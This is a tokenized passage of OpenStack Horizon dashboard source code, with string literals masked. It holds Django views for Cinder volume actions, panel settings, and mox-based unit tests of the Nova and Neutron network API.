<EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> try : <EOL> volume = cinder . volume_get ( self . request , context [ '<STR_LIT>' ] ) <EOL> if ( volume . status == '<STR_LIT>' ) : <EOL> context [ '<STR_LIT>' ] = True <EOL> context [ '<STR_LIT>' ] . set_warning ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> context [ '<STR_LIT>' ] = quotas . tenant_limit_usages ( self . request ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> return { '<STR_LIT>' : self . kwargs [ "<STR_LIT>" ] } <EOL> class UploadToImageView ( forms . ModalFormView ) : <EOL> form_class = project_forms . UploadToImageForm <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> @ memoized . memoized_method <EOL> def get_data ( self ) : <EOL> try : <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> volume = cinder . volume_get ( self . request , volume_id ) <EOL> except Exception : <EOL> error_message = _ ( <EOL> '<STR_LIT>' ) % volume_id <EOL> exceptions . handle ( self . request , <EOL> error_message , <EOL> redirect = self . success_url ) <EOL> return volume <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( UploadToImageView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . get_data ( ) <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> volume = self . get_data ( ) <EOL> return { '<STR_LIT:id>' : self . kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : volume . name , <EOL> '<STR_LIT:status>' : volume . status } <EOL> class CreateTransferView ( forms . ModalFormView ) : <EOL> form_class = project_forms . CreateTransferForm <EOL> template_name = '<STR_LIT>' <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> modal_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_context_data ( self , * args , ** kwargs ) : <EOL> context = super ( CreateTransferView , self ) . get_context_data ( ** kwargs ) <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> context [ '<STR_LIT>' ] = volume_id <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = [ volume_id ] ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> return { '<STR_LIT>' : self . kwargs [ "<STR_LIT>" ] } <EOL> class AcceptTransferView ( forms . ModalFormView ) : <EOL> form_class = project_forms . AcceptTransferForm <EOL> template_name = '<STR_LIT>' <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> modal_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = reverse_lazy ( <EOL> "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> class ShowTransferView ( forms . ModalFormView ) : <EOL> form_class = project_forms . ShowTransferForm <EOL> template_name = '<STR_LIT>' <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> modal_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> cancel_label = _ ( "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_object ( self ) : <EOL> try : <EOL> return self . _object <EOL> except AttributeError : <EOL> transfer_id = self . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> self . _object = cinder . transfer_get ( self . request , transfer_id ) <EOL> return self . _object <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( ShowTransferView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . kwargs [ '<STR_LIT>' ] <EOL> context [ '<STR_LIT>' ] = self . kwargs [ '<STR_LIT>' ] <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = [ <EOL> context [ '<STR_LIT>' ] , context [ '<STR_LIT>' ] ] ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> transfer = self . get_object ( ) <EOL> return { '<STR_LIT:id>' : transfer . id , <EOL> '<STR_LIT:name>' : transfer . name , <EOL> '<STR_LIT>' : self . kwargs [ '<STR_LIT>' ] } <EOL> class UpdateView ( forms . ModalFormView ) : <EOL> form_class = project_forms . UpdateForm <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = '<STR_LIT>' <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_object ( self ) : <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> vol_id = self . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> self . _object = cinder . volume_get ( self . request , vol_id ) <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . request , msg , redirect = url ) <EOL> return self . _object <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( UpdateView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . get_object ( ) <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> volume = self . get_object ( ) <EOL> return { '<STR_LIT>' : self . kwargs [ "<STR_LIT>" ] , <EOL> '<STR_LIT:name>' : volume . name , <EOL> '<STR_LIT:description>' : volume . description , <EOL> '<STR_LIT>' : volume . is_bootable } <EOL> class EditAttachmentsView ( tables . DataTableView , forms . ModalFormView ) : <EOL> table_class = project_tables . AttachmentsTable <EOL> form_class = project_forms . AttachForm <EOL> form_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = '<STR_LIT>' <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> @ memoized . memoized_method <EOL> def get_object ( self ) : <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> return cinder . volume_get ( self . request , volume_id ) <EOL> except Exception : <EOL> self . _object = None <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> def get_data ( self ) : <EOL> attachments = [ ] <EOL> volume = self . get_object ( ) <EOL> if volume is not None : <EOL> for att in volume . attachments : <EOL> att [ '<STR_LIT>' ] = getattr ( volume , '<STR_LIT:name>' , att [ '<STR_LIT>' ] ) <EOL> attachments . append ( att ) <EOL> return attachments <EOL> def get_initial ( self ) : <EOL> try : <EOL> instances , has_more = api . nova . server_list ( self . request ) <EOL> except Exception : <EOL> instances = [ ] <EOL> exceptions . handle ( self . request , <EOL> _ ( "<STR_LIT>" ) ) <EOL> return { '<STR_LIT>' : self . get_object ( ) , <EOL> '<STR_LIT>' : instances } <EOL> @ memoized . memoized_method <EOL> def get_form ( self , ** kwargs ) : <EOL> form_class = kwargs . get ( '<STR_LIT>' , self . get_form_class ( ) ) <EOL> return super ( EditAttachmentsView , self ) . get_form ( form_class ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( EditAttachmentsView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . get_form ( ) <EOL> volume = self . get_object ( ) <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> if volume and volume . status == '<STR_LIT>' : <EOL> context [ '<STR_LIT>' ] = True <EOL> else : <EOL> context [ '<STR_LIT>' ] = False <EOL> context [ '<STR_LIT>' ] = volume <EOL> if self . request . is_ajax ( ) : <EOL> context [ '<STR_LIT>' ] = True <EOL> return context <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> handled = self . construct_tables ( ) <EOL> if handled : <EOL> return handled <EOL> return self . render_to_response ( self . get_context_data ( ** kwargs ) ) <EOL> def post ( self , request , * args , ** kwargs ) : <EOL> form = self . get_form ( ) <EOL> if form . is_valid ( ) : <EOL> return self . form_valid ( form ) <EOL> else : <EOL> return self . get ( request , * args , ** kwargs ) <EOL> class RetypeView ( forms . ModalFormView ) : <EOL> form_class = project_forms . RetypeForm <EOL> modal_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> @ memoized . memoized_method <EOL> def get_data ( self ) : <EOL> try : <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> volume = cinder . volume_get ( self . request , volume_id ) <EOL> except Exception : <EOL> error_message = _ ( <EOL> '<STR_LIT>' ) % volume_id <EOL> exceptions . handle ( self . request , <EOL> error_message , <EOL> redirect = self . success_url ) <EOL> return volume <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( RetypeView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . get_data ( ) <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> volume = self . get_data ( ) <EOL> return { '<STR_LIT:id>' : self . kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : volume . name , <EOL> '<STR_LIT>' : volume . volume_type } <EOL> class EncryptionDetailView ( generic . TemplateView ) : <EOL> template_name = '<STR_LIT>' <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( EncryptionDetailView , self ) . get_context_data ( ** kwargs ) <EOL> volume = self . get_volume_data ( ) <EOL> context [ "<STR_LIT>" ] = self . get_encryption_data ( ) <EOL> context [ "<STR_LIT>" ] = volume <EOL> context [ "<STR_LIT>" ] = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % { '<STR_LIT>' : <EOL> volume . name } <EOL> return context <EOL> @ memoized . memoized_method <EOL> def get_encryption_data ( self ) : <EOL> try : <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> self . _encryption_metadata = cinder . volume_get_encryption_metadata ( self . request , <EOL> volume_id ) <EOL> except Exception : <EOL> redirect = self . get_redirect_url ( ) <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> redirect = redirect ) <EOL> return self . _encryption_metadata <EOL> @ memoized . memoized_method <EOL> def get_volume_data ( self ) : <EOL> try : <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> volume = cinder . volume_get ( self . request , volume_id ) <EOL> except Exception : <EOL> redirect = self . get_redirect_url ( ) <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) , <EOL> redirect = redirect ) <EOL> return volume <EOL> def get_redirect_url ( self ) : <EOL> return reverse ( '<STR_LIT>' ) </s>
<s> PANEL = '<STR_LIT>' <EOL> PANEL_DASHBOARD = '<STR_LIT>' <EOL> PANEL_GROUP = '<STR_LIT>' <EOL> ADD_PANEL = '<STR_LIT>' </s>
<s> PANEL = '<STR_LIT>' <EOL> PANEL_DASHBOARD = '<STR_LIT>' <EOL> PANEL_GROUP = '<STR_LIT:default>' <EOL> ADD_PANEL = '<STR_LIT>' </s>
<s> import collections <EOL> import copy <EOL> import uuid <EOL> from django import http <EOL> from django . test . utils import override_settings <EOL> from mox3 . mox import IsA <EOL> import six <EOL> from novaclient . v2 import floating_ip_pools <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . test import helpers as test <EOL> class NetworkClientTestCase ( test . APITestCase ) : <EOL> def test_networkclient_no_neutron ( self ) : <EOL> self . mox . StubOutWithMock ( api . base , '<STR_LIT>' ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( False ) <EOL> self . mox . ReplayAll ( ) <EOL> nc = api . network . NetworkClient ( self . request ) <EOL> self . assertIsInstance ( nc . floating_ips , api . nova . FloatingIpManager ) <EOL> self . assertIsInstance ( nc . secgroups , api . nova . SecurityGroupManager ) <EOL> def test_networkclient_neutron ( self ) : <EOL> self . mox . StubOutWithMock ( api . base , '<STR_LIT>' ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( True ) <EOL> self . neutronclient = self . stub_neutronclient ( ) <EOL> self . neutronclient . list_extensions ( ) . AndReturn ( { '<STR_LIT>' : self . api_extensions . list ( ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> nc = api . network . NetworkClient ( self . request ) <EOL> self . assertIsInstance ( nc . floating_ips , api . neutron . FloatingIpManager ) <EOL> self . assertIsInstance ( nc . secgroups , api . neutron . SecurityGroupManager ) <EOL> def test_networkclient_neutron_with_nova_security_group ( self ) : <EOL> self . mox . StubOutWithMock ( api . base , '<STR_LIT>' ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( True ) <EOL> self . neutronclient = self . stub_neutronclient ( ) <EOL> self . neutronclient . list_extensions ( ) . AndReturn ( { '<STR_LIT>' : [ ] } ) <EOL> self . mox . ReplayAll ( ) <EOL> nc = api . network . NetworkClient ( self . request ) <EOL> self . assertIsInstance ( nc . floating_ips , api . neutron . FloatingIpManager ) <EOL> self . assertIsInstance ( nc . secgroups , api . nova . SecurityGroupManager ) <EOL> class NetworkApiNovaTestBase ( test . APITestCase ) : <EOL> def setUp ( self ) : <EOL> super ( NetworkApiNovaTestBase , self ) . setUp ( ) <EOL> self . mox . StubOutWithMock ( api . base , '<STR_LIT>' ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( False ) <EOL> class NetworkApiNovaSecurityGroupTests ( NetworkApiNovaTestBase ) : <EOL> def test_server_update_security_groups ( self ) : <EOL> all_secgroups = self . security_groups . list ( ) <EOL> added_secgroup = all_secgroups [ <NUM_LIT:2> ] <EOL> rm_secgroup = all_secgroups [ <NUM_LIT:0> ] <EOL> cur_secgroups_raw = [ { '<STR_LIT:id>' : sg . id , '<STR_LIT:name>' : sg . name , <EOL> '<STR_LIT>' : [ ] } <EOL> for sg in all_secgroups [ <NUM_LIT:0> : <NUM_LIT:2> ] ] <EOL> cur_secgroups_ret = { '<STR_LIT>' : cur_secgroups_raw } <EOL> new_sg_ids = [ sg . id for sg in all_secgroups [ <NUM_LIT:1> : <NUM_LIT:3> ] ] <EOL> instance_id = self . servers . first ( ) . id <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . security_groups = self . mox . CreateMockAnything ( ) <EOL> novaclient . servers = self . mox . CreateMockAnything ( ) <EOL> novaclient . client = self . mox . CreateMockAnything ( ) <EOL> novaclient . security_groups . list ( ) . AndReturn ( all_secgroups ) <EOL> url = '<STR_LIT>' % instance_id <EOL> novaclient . client . get ( url ) . AndReturn ( ( <NUM_LIT:200> , cur_secgroups_ret ) ) <EOL> novaclient . servers . add_security_group ( instance_id , added_secgroup . name ) <EOL> novaclient . servers . remove_security_group ( instance_id , rm_secgroup . name ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . server_update_security_groups ( <EOL> self . request , instance_id , new_sg_ids ) <EOL> class NetworkApiNovaFloatingIpTests ( NetworkApiNovaTestBase ) : <EOL> def test_floating_ip_pools_list ( self ) : <EOL> pool_names = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> pools = [ floating_ip_pools . FloatingIPPool ( <EOL> None , { '<STR_LIT:name>' : pool } ) for pool in pool_names ] <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . floating_ip_pools = self . mox . CreateMockAnything ( ) <EOL> novaclient . floating_ip_pools . list ( ) . AndReturn ( pools ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . floating_ip_pools_list ( self . request ) <EOL> self . assertEqual ( pool_names , [ p . name for p in ret ] ) <EOL> def test_floating_ip_list ( self ) : <EOL> fips = self . api_floating_ips . list ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . floating_ips = self . mox . CreateMockAnything ( ) <EOL> novaclient . floating_ips . list ( ) . AndReturn ( fips ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . tenant_floating_ip_list ( self . request ) <EOL> for r , e in zip ( ret , fips ) : <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( getattr ( e , attr ) , getattr ( r , attr ) ) <EOL> self . assertEqual ( e . instance_id , r . port_id ) <EOL> exp_instance_type = '<STR_LIT>' if e . instance_id else None <EOL> self . assertEqual ( exp_instance_type , r . instance_type ) <EOL> def test_floating_ip_get ( self ) : <EOL> fip = self . api_floating_ips . first ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . floating_ips = self . mox . CreateMockAnything ( ) <EOL> novaclient . floating_ips . get ( fip . id ) . AndReturn ( fip ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . tenant_floating_ip_get ( self . request , fip . id ) <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( getattr ( fip , attr ) , getattr ( ret , attr ) ) <EOL> self . assertEqual ( fip . instance_id , ret . port_id ) <EOL> self . assertEqual ( fip . instance_id , ret . instance_id ) <EOL> self . assertEqual ( '<STR_LIT>' , ret . instance_type ) <EOL> def test_floating_ip_allocate ( self ) : <EOL> pool_name = '<STR_LIT>' <EOL> fip = [ fip for fip in self . api_floating_ips . list ( ) <EOL> if not fip . instance_id ] [ <NUM_LIT:0> ] <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . floating_ips = self . mox . CreateMockAnything ( ) <EOL> novaclient . floating_ips . create ( pool = pool_name ) . AndReturn ( fip ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . tenant_floating_ip_allocate ( self . request , pool_name ) <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( getattr ( fip , attr ) , getattr ( ret , attr ) ) <EOL> self . assertIsNone ( ret . port_id ) <EOL> self . assertIsNone ( ret . instance_type ) <EOL> def test_floating_ip_release ( self ) : <EOL> fip = self . api_floating_ips . first ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . floating_ips = self . mox . CreateMockAnything ( ) <EOL> novaclient . floating_ips . delete ( fip . id ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . tenant_floating_ip_release ( self . request , fip . id ) <EOL> def test_floating_ip_associate ( self ) : <EOL> server = api . nova . Server ( self . servers . first ( ) , self . request ) <EOL> floating_ip = self . floating_ips . first ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . floating_ips = self . mox . CreateMockAnything ( ) <EOL> novaclient . servers = self . mox . CreateMockAnything ( ) <EOL> novaclient . servers . get ( server . id ) . AndReturn ( server ) <EOL> novaclient . floating_ips . get ( floating_ip . id ) . AndReturn ( floating_ip ) <EOL> novaclient . servers . add_floating_ip ( server . id , floating_ip . ip ) . AndReturn ( server ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . floating_ip_associate ( self . request , <EOL> floating_ip . id , <EOL> server . id ) <EOL> def test_floating_ip_disassociate ( self ) : <EOL> server = api . nova . Server ( self . servers . first ( ) , self . request ) <EOL> floating_ip = self . api_floating_ips . first ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . servers = self . mox . CreateMockAnything ( ) <EOL> novaclient . floating_ips = self . mox . CreateMockAnything ( ) <EOL> novaclient . servers . get ( server . id ) . AndReturn ( server ) <EOL> novaclient . floating_ips . get ( floating_ip . id ) . AndReturn ( floating_ip ) <EOL> novaclient . servers . remove_floating_ip ( server . id , floating_ip . ip ) . AndReturn ( server ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . floating_ip_disassociate ( self . request , <EOL> floating_ip . id ) <EOL> def test_floating_ip_target_list ( self ) : <EOL> servers = self . servers . list ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . servers = self . mox . CreateMockAnything ( ) <EOL> novaclient . servers . list ( ) . AndReturn ( servers ) <EOL> self . mox . ReplayAll ( ) <EOL> targets = api . network . floating_ip_target_list ( self . request ) <EOL> for target , server in zip ( targets , servers ) : <EOL> self . assertEqual ( server . id , target . id ) <EOL> self . assertEqual ( '<STR_LIT>' % ( server . name , server . id ) , target . name ) <EOL> def test_floating_ip_target_get_by_instance ( self ) : <EOL> self . mox . ReplayAll ( ) <EOL> instance_id = self . servers . first ( ) . id <EOL> ret = api . network . floating_ip_target_get_by_instance ( self . request , <EOL> instance_id ) <EOL> self . assertEqual ( instance_id , ret ) <EOL> class NetworkApiNeutronTestBase ( test . APITestCase ) : <EOL> def setUp ( self ) : <EOL> super ( NetworkApiNeutronTestBase , self ) . setUp ( ) <EOL> self . mox . StubOutWithMock ( api . base , '<STR_LIT>' ) <EOL> api . base . is_service_enabled ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . AndReturn ( True ) <EOL> self . qclient = self . stub_neutronclient ( ) <EOL> class NetworkApiNeutronTests ( NetworkApiNeutronTestBase ) : <EOL> def _get_expected_addresses ( self , server , no_fip_expected = True ) : <EOL> server_ports = self . ports . filter ( device_id = server . id ) <EOL> addresses = collections . defaultdict ( list ) <EOL> for p in server_ports : <EOL> net_name = self . networks . get ( id = p [ '<STR_LIT>' ] ) . name <EOL> for ip in p . fixed_ips : <EOL> addresses [ net_name ] . append ( <EOL> { '<STR_LIT:version>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : ip [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : p . mac_address , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> if no_fip_expected : <EOL> continue <EOL> fips = self . q_floating_ips . filter ( port_id = p [ '<STR_LIT:id>' ] ) <EOL> if not fips : <EOL> continue <EOL> fip = fips [ <NUM_LIT:0> ] <EOL> addresses [ net_name ] . append ( <EOL> { '<STR_LIT:version>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : fip . floating_ip_address , <EOL> '<STR_LIT>' : p . mac_address , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return addresses <EOL> def _check_server_address ( self , res_server_data , no_fip_expected = False ) : <EOL> expected_addresses = self . _get_expected_addresses ( res_server_data , <EOL> no_fip_expected ) <EOL> self . assertEqual ( len ( expected_addresses ) , <EOL> len ( res_server_data . addresses ) ) <EOL> for net , addresses in expected_addresses . items ( ) : <EOL> self . assertIn ( net , res_server_data . addresses ) <EOL> self . assertEqual ( addresses , res_server_data . addresses [ net ] ) <EOL> def _test_servers_update_addresses ( self , router_enabled = True ) : <EOL> tenant_id = self . request . user . tenant_id <EOL> servers = self . servers . list ( ) <EOL> server_ids = [ server . id for server in servers ] <EOL> server_ports = [ p for p in self . api_ports . list ( ) <EOL> if p [ '<STR_LIT>' ] in server_ids ] <EOL> server_port_ids = [ p [ '<STR_LIT:id>' ] for p in server_ports ] <EOL> if router_enabled : <EOL> assoc_fips = [ fip for fip in self . api_q_floating_ips . list ( ) <EOL> if fip [ '<STR_LIT>' ] in server_port_ids ] <EOL> server_network_ids = [ p [ '<STR_LIT>' ] for p in server_ports ] <EOL> server_networks = [ net for net in self . api_networks . list ( ) <EOL> if net [ '<STR_LIT:id>' ] in server_network_ids ] <EOL> self . qclient . list_ports ( device_id = server_ids ) . AndReturn ( { '<STR_LIT>' : server_ports } ) <EOL> if router_enabled : <EOL> self . qclient . list_floatingips ( tenant_id = tenant_id , <EOL> port_id = server_port_ids ) . AndReturn ( { '<STR_LIT>' : assoc_fips } ) <EOL> self . qclient . list_ports ( tenant_id = tenant_id ) . AndReturn ( { '<STR_LIT>' : self . api_ports . list ( ) } ) <EOL> self . qclient . list_networks ( id = set ( server_network_ids ) ) . AndReturn ( { '<STR_LIT>' : server_networks } ) <EOL> self . qclient . list_subnets ( ) . AndReturn ( { '<STR_LIT>' : self . api_subnets . list ( ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . servers_update_addresses ( self . request , servers ) <EOL> self . assertEqual ( self . servers . count ( ) , len ( servers ) ) <EOL> self . assertEqual ( [ server . id for server in self . servers . list ( ) ] , <EOL> [ server . id for server in servers ] ) <EOL> no_fip_expected = not router_enabled <EOL> self . _check_server_address ( servers [ <NUM_LIT:0> ] , no_fip_expected ) <EOL> addrs = servers [ <NUM_LIT:0> ] . addresses [ '<STR_LIT>' ] <EOL> if router_enabled : <EOL> self . assertEqual ( <NUM_LIT:2> , len ( addrs ) ) <EOL> self . assertEqual ( '<STR_LIT>' , addrs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , addrs [ <NUM_LIT:1> ] [ '<STR_LIT>' ] ) <EOL> else : <EOL> self . assertEqual ( <NUM_LIT:1> , len ( addrs ) ) <EOL> self . assertEqual ( '<STR_LIT>' , addrs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _check_server_address ( servers [ <NUM_LIT:1> ] , no_fip_expected ) <EOL> addrs = servers [ <NUM_LIT:1> ] . addresses [ '<STR_LIT>' ] <EOL> self . assertEqual ( <NUM_LIT:1> , len ( addrs ) ) <EOL> self . assertEqual ( '<STR_LIT>' , addrs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( servers [ <NUM_LIT:2> ] . addresses ) <EOL> @ override_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : True } ) <EOL> def test_servers_update_addresses ( self ) : <EOL> self . _test_servers_update_addresses ( ) <EOL> @ override_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : False } ) <EOL> def test_servers_update_addresses_router_disabled ( self ) : <EOL> self . _test_servers_update_addresses ( router_enabled = False ) <EOL> class NetworkApiNeutronSecurityGroupTests ( NetworkApiNeutronTestBase ) : <EOL> def setUp ( self ) : <EOL> super ( NetworkApiNeutronSecurityGroupTests , self ) . setUp ( ) <EOL> self . qclient . list_extensions ( ) . AndReturn ( { '<STR_LIT>' : self . api_extensions . list ( ) } ) <EOL> self . sg_dict = dict ( [ ( sg [ '<STR_LIT:id>' ] , sg [ '<STR_LIT:name>' ] ) for sg <EOL> in self . api_q_secgroups . list ( ) ] ) <EOL> def _cmp_sg_rule ( self , exprule , retrule ) : <EOL> self . assertEqual ( exprule [ '<STR_LIT:id>' ] , retrule . id ) <EOL> self . assertEqual ( exprule [ '<STR_LIT>' ] , <EOL> retrule . parent_group_id ) <EOL> self . assertEqual ( exprule [ '<STR_LIT>' ] , <EOL> retrule . direction ) <EOL> self . assertEqual ( exprule [ '<STR_LIT>' ] , <EOL> retrule . ethertype ) <EOL> self . assertEqual ( exprule [ '<STR_LIT>' ] , <EOL> retrule . from_port ) <EOL> self . assertEqual ( exprule [ '<STR_LIT>' ] , <EOL> retrule . to_port , ) <EOL> if ( exprule [ '<STR_LIT>' ] is None and <EOL> exprule [ '<STR_LIT>' ] is None ) : <EOL> expcidr = ( '<STR_LIT>' if exprule [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> else '<STR_LIT>' ) <EOL> else : <EOL> expcidr = exprule [ '<STR_LIT>' ] <EOL> self . assertEqual ( expcidr , retrule . ip_range . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( self . sg_dict . get ( exprule [ '<STR_LIT>' ] ) , <EOL> retrule . group . get ( '<STR_LIT:name>' ) ) <EOL> def _cmp_sg ( self , exp_sg , ret_sg ) : <EOL> self . assertEqual ( exp_sg [ '<STR_LIT:id>' ] , ret_sg . id ) <EOL> self . assertEqual ( exp_sg [ '<STR_LIT:name>' ] , ret_sg . name ) <EOL> exp_rules = exp_sg [ '<STR_LIT>' ] <EOL> self . assertEqual ( len ( exp_rules ) , len ( ret_sg . rules ) ) <EOL> for ( exprule , retrule ) in six . moves . zip ( exp_rules , ret_sg . rules ) : <EOL> self . _cmp_sg_rule ( exprule , retrule ) <EOL> def test_security_group_list ( self ) : <EOL> sgs = self . api_q_secgroups . list ( ) <EOL> tenant_id = self . request . user . tenant_id <EOL> self . qclient . list_security_groups ( tenant_id = tenant_id ) . AndReturn ( { '<STR_LIT>' : copy . deepcopy ( sgs ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> rets = api . network . security_group_list ( self . request ) <EOL> self . assertEqual ( len ( sgs ) , len ( rets ) ) <EOL> for ( exp , ret ) in six . moves . zip ( sgs , rets ) : <EOL> self . _cmp_sg ( exp , ret ) <EOL> def test_security_group_get ( self ) : 